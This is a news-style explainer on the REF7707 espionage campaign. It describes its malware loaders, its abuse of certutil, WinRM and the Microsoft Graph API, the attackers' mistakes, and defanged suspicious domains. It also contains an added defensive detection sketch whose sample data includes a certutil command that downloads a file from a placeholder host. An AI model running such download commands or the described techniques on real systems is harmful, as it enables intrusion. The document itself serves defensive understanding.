A group of hackers has been caught running a large-scale cyber spying operation, now called REF7707. The attack was first noticed in November 2024 when strange activity was detected in the Foreign Ministry of a South American country. As experts looked deeper, they found that the same hackers had also targeted several other organizations in Southeast Asia.
The attackers used advanced hacking tools to break into computer systems, steal information, and stay hidden for a long time. However, even though they were highly skilled, they made serious mistakes that exposed their operation.
The Malicious Software Used in the Attack
The hackers used three main types of malware (harmful programs) to infect computers and control them remotely:
FINALDRAFT: A Hidden Control System
One of the key tools in this attack was FINALDRAFT, a type of software that allowed hackers to secretly take control of a computer. Once installed, they could:
- Run commands: Hackers could make the infected computer perform actions, like downloading more malware or collecting sensitive files.
- Hide in normal programs: They inserted their malicious code into everyday programs like MS Paint, making it harder for security software to detect.
- Use Microsoft’s online services: The hackers used Microsoft Graph API, a service that businesses commonly use, to blend their malicious activities with normal traffic.
GUIDLOADER and PATHLOADER: Sneaky Installers
These two programs acted as delivery tools that installed FINALDRAFT on infected computers. Instead of storing dangerous files on a computer’s hard drive (where they could be detected), they loaded the malware directly into the computer’s memory. This method helps cybercriminals avoid antivirus scans.
To further cover their tracks, they hid malware downloads on popular websites, including:
1. Google Firebase (a cloud service used by developers)
2. Pastebin (a site often used to store and share text)
3. Web storage systems of Southeast Asian universities
By using trusted websites, they made it harder for security systems to recognize the attack.
Hackers Misused Windows Tools to Spread
Instead of only relying on their own hacking tools, the attackers took advantage of built-in Windows programs to spread across networks:
- Certutil.exe: A built-in program for managing security certificates. Here, the hackers misused it to download and install their malware.
- Windows Remote Management (WinRM): A legitimate Windows tool that lets administrators control computers remotely. The hackers used it to move from one system to another, which suggests they had already stolen valid passwords in earlier attacks.
By using tools that were already part of Windows, they avoided setting off alarms that custom-made malware might trigger.
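A defender-side detection sketch for the behaviours described on this page: certutil.exe used as a downloader, commands arriving over WinRM, and Microsoft Graph API traffic coming from a program such as MS Paint that should never need it. This is an added example, not code from any report on REF7707; it runs over constructed telemetry events, and the event fields, the wsmprovhost.exe parent-process check and the Graph allowlist are assumptions to adapt to real endpoint logs.

```python
import re

# Constructed sample telemetry (not real logs): process-creation and network events
SAMPLE_EVENTS = [
    {"type": "process", "parent": "explorer.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://example.invalid/x.txt x.txt"},
    {"type": "process", "parent": "explorer.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -verify site.cer"},
    {"type": "process", "parent": "wsmprovhost.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"type": "network", "image": "mspaint.exe", "dest_host": "graph.microsoft.com"},
    {"type": "network", "image": "outlook.exe", "dest_host": "graph.microsoft.com"},
    {"type": "process", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Assumed allowlist of programs expected to talk to Graph; tune it per environment
GRAPH_ALLOWLIST = {"outlook.exe", "teams.exe", "onedrive.exe", "msedge.exe"}

def classify(event):
    """Return the names of the rules an event trips (empty list if benign)."""
    hits = []
    image = event["image"].lower()
    if event["type"] == "process":
        cmd = event["cmdline"].lower()
        # certutil fetching remote content instead of handling local certificates
        if image == "certutil.exe" and ("-urlcache" in cmd or URL_RE.search(cmd)):
            hits.append("certutil-remote-download")
        # wsmprovhost.exe hosts WinRM sessions; its children are remotely issued commands
        if event["parent"].lower() == "wsmprovhost.exe":
            hits.append("winrm-spawned-process")
    elif event["type"] == "network":
        host = event["dest_host"].lower()
        # Graph API traffic from a program with no business using it (e.g. MS Paint)
        if host.endswith("graph.microsoft.com") and image not in GRAPH_ALLOWLIST:
            hits.append("graph-api-from-unexpected-process")
    return hits

def scan(events):
    """Pair each suspicious event's image name with its triggered rules, in order."""
    findings = []
    for event in events:
        hits = classify(event)
        if hits:
            findings.append((event["image"], hits))
    return findings

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
```

WinRM-spawned processes are normal on hosts that administrators manage remotely, so that rule is a lead to correlate with unexpected source accounts or hosts rather than an alert on its own.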
How the Hackers Were Caught
Even though REF7707 was a well-planned attack, the hackers made several big mistakes that helped cybersecurity experts uncover their activities.
Key Errors They Made:
1. Left behind test versions of their malware: Some samples contained error messages and incomplete code, revealing how they built their attack.
2. Exposed their own websites: Many of their fake websites remained open and accessible, allowing experts to track their movements.
3. Messed up their encryption: Some malware was poorly coded, which made it easier for researchers to analyze and understand how it worked.
Tracing the Hackers’ Footsteps
By following these mistakes, security researchers tracked the hackers’ network of fake websites and compromised services. Some of the suspicious domains they discovered included:
1. digert.ictnsc[.]com
2. support.vmphere[.]com
3. hobiter[.]com and vm-clouds[.]net, which shared the same setup, suggesting they were controlled by the same group.
The attackers also abused Microsoft’s services to make their hacking traffic look like normal company activity.
What We Can Learn from This Attack
REF7707 is a clear example of how cybercriminals use sophisticated tricks to break into important systems, stay hidden, and steal data. But it also shows that even expert hackers make mistakes, and when they do, security teams can use those errors to track them down.
Hackers are constantly improving their tactics, but as this case shows, cybersecurity experts are also getting better at catching them.